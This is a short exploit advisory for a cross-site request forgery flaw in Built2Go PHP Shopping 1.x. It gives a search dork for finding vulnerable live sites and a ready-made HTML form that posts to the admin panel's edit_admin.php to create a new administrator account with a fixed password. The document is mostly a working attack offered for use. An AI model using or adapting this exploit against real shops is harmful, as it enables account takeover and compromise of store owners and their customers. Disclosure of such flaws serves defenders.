Built2Go PHP Shopping version 1.x suffers from a cross site request forgery vulnerability.
c88f0c657889d78d03a3fe805274b562dc61938b49f2435de9ec600fbd7d9f55
Built2Go PHP Shopping v 1.x – CSRF Vulnerability(add admin)
====================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.built2go.com/
.:. Dork : “Powered by Built2Go PHP Shopping”
####################################################################
===[ Exploit ]===
<form method=”POST” name=”form0″ action=”
http://SITE/adminpanel/edit_admin.php”>
<input type=”hidden” name=”userid” value=”ADMIN”/>
<input type=”hidden” name=”pass” value=”12121212″/>
<input type=”hidden” name=”retypepass” value=”12121212″/>
<input type=”hidden” name=”addnew” value=”1″/>
<input type=”hidden” name=”action” value=”save”/>
<input type=”hidden” name=”new” value=”Submit”/>
</form>
</body>
</html>
####################################################################